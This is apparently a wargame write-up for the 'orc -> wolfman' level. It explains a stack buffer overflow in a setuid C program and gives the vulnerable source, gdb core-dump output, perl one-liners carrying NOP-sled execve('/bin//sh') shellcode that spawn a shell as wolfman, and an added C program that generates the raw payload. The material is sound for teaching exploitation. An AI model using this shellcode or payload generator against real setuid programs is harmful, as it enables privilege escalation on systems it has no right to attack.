LEVEL5 (orc -> wolfman) : egghunter + bufferhunter

It looks much like beating orc, except that this time the buffer itself also seems to get wiped. Let's look at the code.

[orc@localhost .izayoi]$ cat wolfman.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* added here for memset/strlen/strcpy; the original relied on implicit declarations */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter: zero every environment string, so shellcode cannot be staged in the environment
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // byte 47 of argv[1] is the high byte of the overwritten return address: it must be 0xbf (a stack address)
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);   // unbounded copy: bytes 40..47 overwrite sfp and ret
        printf("%s\n", buffer);

        // shellcode hunter: wipes the 40-byte buffer, but not sfp/ret and not the original argv[1] string
        memset(buffer, 0, 40);
}


It is built like the orc challenge, but now it also zeroes buffer after the copy. That still leaves the approach from before: point the return address at argv[1]. The egghunter only zeroes the environment strings and the final memset only covers the 40 bytes of buffer; the original argv[1] string sits higher on the stack and is never touched, and the 8 bytes that spilled past buffer into sfp and ret survive the memset. The argv[1][47] check merely insists that the return address be of the form 0xbfXXXXXX, which is exactly what a stack address looks like here.

[orc@localhost .izayoi]$ ./wolfman `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[orc@localhost .izayoi]$ gdb -c core -q
Core was generated by `./wolfman ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/120x $esp
....
0xbffffc40:     0x38366900      0x2f2e0036      0x666c6f77      0x006e616d
0xbffffc50:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc60:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc70:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc80:     0x00000000      0x00000000      0x00000000      0x00000000
....
(gdb)

By now this layout is all too familiar.
[stack] [sfp]     [ret]      [argc] [argv] [env]
                   ^0xbffffc50              ^"\x90"x20+shellcode+0xbffffc50

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x50\xfc\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€Püÿ¿
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x42\xfc\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€Büÿ¿
bash$

Once again the core dump put the first payload address at 0xbffffc50, yet when wolfman was actually taken down a return address of 0xbffffc42 worked as well, so in the live run the NOP sled covers at least 0xbffffc42 through 0xbffffc50. A shift between the two runs is expected: the core was generated from the .izayoi directory and the exploit from orc's home, and the environment strings (PWD among them) are zeroed but not removed, so their lengths still move where argv[1] lands. That is precisely what the 20-byte NOP sled is for; any address inside it slides into the shellcode.
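As an added example (not code from the original post), the following C program builds the same 48-byte payload the perl one-liner produces, pre-checks it against the two constraints wolfman imposes (byte 47 must be 0xbf, and no NUL may appear before it or strcpy would stop early), and replays the frame layout from the core dump to show that memset(buffer, 0, 40) leaves the overwritten return address intact. The frame offsets (buffer 40, sfp 4, ret 4) and the shellcode are taken from the post; the sled-start value used in the test is an assumption for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Frame layout read off the core dump above: buffer[40], then the saved
 * frame pointer (4 bytes), then the saved return address (4 bytes). */
#define BUF_SIZE    40
#define PAYLOAD_LEN 48      /* 40 + sfp 4 + ret 4: byte 47 is what wolfman checks */
#define RET_OFF     44

/* The 24-byte execve("/bin//sh") shellcode used in the post. */
static const unsigned char SHELLCODE[] = {
    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,
    0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0x99,0xb0,0x0b,0xcd,0x80
};
#define NOP_LEN (RET_OFF - (int)sizeof SHELLCODE)   /* 20 bytes of 0x90 */

/* Build NOP sled + shellcode + little-endian ret into out (cap >= PAYLOAD_LEN).
 * Returns PAYLOAD_LEN, or 0 if the output buffer is too small. */
size_t build_payload(uint32_t ret, unsigned char *out, size_t cap)
{
    if (cap < PAYLOAD_LEN)
        return 0;
    memset(out, 0x90, NOP_LEN);
    memcpy(out + NOP_LEN, SHELLCODE, sizeof SHELLCODE);
    out[RET_OFF + 0] = (unsigned char)(ret & 0xff);
    out[RET_OFF + 1] = (unsigned char)((ret >> 8) & 0xff);
    out[RET_OFF + 2] = (unsigned char)((ret >> 16) & 0xff);
    out[RET_OFF + 3] = (unsigned char)((ret >> 24) & 0xff);
    return PAYLOAD_LEN;
}

/* Mirror of the gate in wolfman.c: the high byte of ret must be 0xbf,
 * i.e. the return address has to point somewhere on the stack. */
int passes_wolfman_check(const unsigned char *p)
{
    return p[47] == 0xbf;
}

/* strcpy stops at the first NUL, so a payload with a 0x00 byte before
 * byte 47 never reaches the saved return address. */
int has_no_nul(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) == NULL;
}

static uint32_t le32(const unsigned char *b)
{
    return (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
           ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
}

/* Replay what wolfman does to its own frame: copy the 48 bytes in, then
 * memset(buffer, 0, 40). Returns the value left in ret afterwards; the
 * "shellcode hunter" only reaches buffer, never sfp/ret or argv[1]. */
uint32_t simulate_wolfman(const unsigned char *payload)
{
    unsigned char frame[PAYLOAD_LEN];       /* [0..39] buffer, [40..43] sfp, [44..47] ret */
    memset(frame, 0, sizeof frame);
    memcpy(frame, payload, PAYLOAD_LEN);    /* effect of strcpy(buffer, argv[1]) */
    memset(frame, 0, BUF_SIZE);             /* the memset(buffer, 0, 40) at the end */
    return le32(frame + RET_OFF);
}

/* Does ret land on a NOP (or the first shellcode byte) when the sled really
 * starts at sled_start? Both 0xbffffc50 and 0xbffffc42 gave a shell in the
 * post, so the live sled started no later than 0xbffffc42. */
int lands_in_sled(uint32_t ret, uint32_t sled_start)
{
    return ret >= sled_start && ret <= sled_start + NOP_LEN;
}

/* Emit the raw payload, e.g.:  ./wolfman "$(./gen 0xbffffc50)" */
int main(int argc, char **argv)
{
    unsigned char p[PAYLOAD_LEN];
    uint32_t ret = argc > 1 ? (uint32_t)strtoul(argv[1], NULL, 0) : 0xbffffc50u;
    if (!build_payload(ret, p, sizeof p) || !passes_wolfman_check(p) ||
        !has_no_nul(p, PAYLOAD_LEN)) {
        fprintf(stderr, "bad return address: need 0xbfxxxxxx with no zero byte\n");
        return 1;
    }
    fwrite(p, 1, PAYLOAD_LEN, stdout);
    return 0;
}
```

The pre-flight checks catch the two ways this payload silently fails: a return address whose high byte is not 0xbf trips wolfman's gate before strcpy runs, and a zero byte anywhere in the 48 bytes truncates the copy so ret is never overwritten. lands_in_sled makes the point of the two successful addresses explicit: the exact sled start is unknown, but any guess within 20 bytes of it works.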
Posted by john@memory :